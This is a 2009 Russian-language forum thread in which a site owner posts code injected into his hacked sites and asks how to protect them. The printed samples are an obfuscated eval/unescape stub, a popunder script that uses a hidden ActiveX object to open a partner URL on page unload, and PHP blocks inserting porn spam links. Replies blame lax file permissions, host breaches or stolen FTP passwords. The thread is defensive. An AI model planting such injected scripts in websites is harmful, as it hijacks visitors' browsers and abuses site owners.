Вредоносный код | Безопасность сайта | Форум

Дата: 04.05.2009, в 01:55 | Сообщение №1

ПользовательПользователь №: 215
Сообщений: 39

Уже не первый раз мои сайты на слаеде подвергаются атакам, с установкой вредоносного кода.

Сейчас чищу каждый файл, вот часть некоторых "левых" кодов:

Код
1	<script> eval(unescape("document.write%28String.fromCharCode%2860 //удалено, поскольку не несет смысловой нагрузки %3B")); </script>

Код

1

<script language="JavaScript">
function y(){self.focus()} self.moveTo(0,0);self.resizeTo(screen.availWidth,screen.availHeight); y();
setInterval("y()",300000);
</script>
<script language="javascript"></script>

<script>
var isXPSP2 = false;
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";

//--------------------------------------------------------------------------------

function ext()
{
if(exit)
{
exit=false;

if(!isXPSP2 && !usePopDialog)
{
window.open(popURL,"",popWindowOptions);
}
else if(!isXPSP2 && usePopDialog)
{
eval("window.showModalDialog(popURL,'',popDialogOptions)");
}
else
{
iie.launchURL(popURL);
}
}
}

//--------------------------------------------------------------------------------

function brs()
{
document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>";
}

//--------------------------------------------------------------------------------

function ver()
{
isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1);
if(isXPSP2) brs();
}

//--------------------------------------------------------------------------------
usePopDialog = false;
var refurl = window.location;
var popURL = 'http://cherrytv.ru/?partner=283';
isUsingSpecial = true;
eval("window.attachEvent('onload',ver);");
eval("window.attachEvent('onunload',ext);");

//--------------------------------------------------------------------------------
</script>
<body STYLE="behavior:url(#default#clientcaps)" ID="oClientCaps" onUnload="normal_exit()"><?php echo ' 
 
 
 
<div align="center">
<center>
<table border="0" width="100%">
<tr>
<td width="50%"><a href="http://www.eroticweb.ru">порно</a></td>
</center>
<td width="50%">
<a href="http://www.eroticweb.ru">скачать
порно</a></td>
</tr>
</table>
</div>'; ?><?php echo ' 
<a href=http://eroticweb.ru>скачать порно</a>
<a href=http://eroticweb.ru>порно</a>'; ?>

А также непонятные файлы (прикрепил к посту) и папки.

Может кто знает, как можно обезопасить себя от подобного?

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Отредактированно Serg_pnz 04.05.2009 г. в 08:15:37

Serg_pnz

Дата: 04.05.2009, в 09:54 | Сообщение №3

АдминистраторПользователь №: 1
Сообщений: 2243

Как правило причины кроются:
1. Неправильные (избыточные) права на файлы
2. Взлом хостера
3. Взлом (кража) паролей фтп (ищи троянов у тебя на компе)

moskmii

Дата: 06.07.2009, в 23:30 | Сообщение №5

Активный участникПользователь №: 96
Сообщений: 184

Воспользуйся этим скриптом и поменяй пароли фтп, проверь ком антивирусом...

http://www.ponedelnikov.net/index.php?name=Forums&op=showtopic&id=1236&pagenum=1#7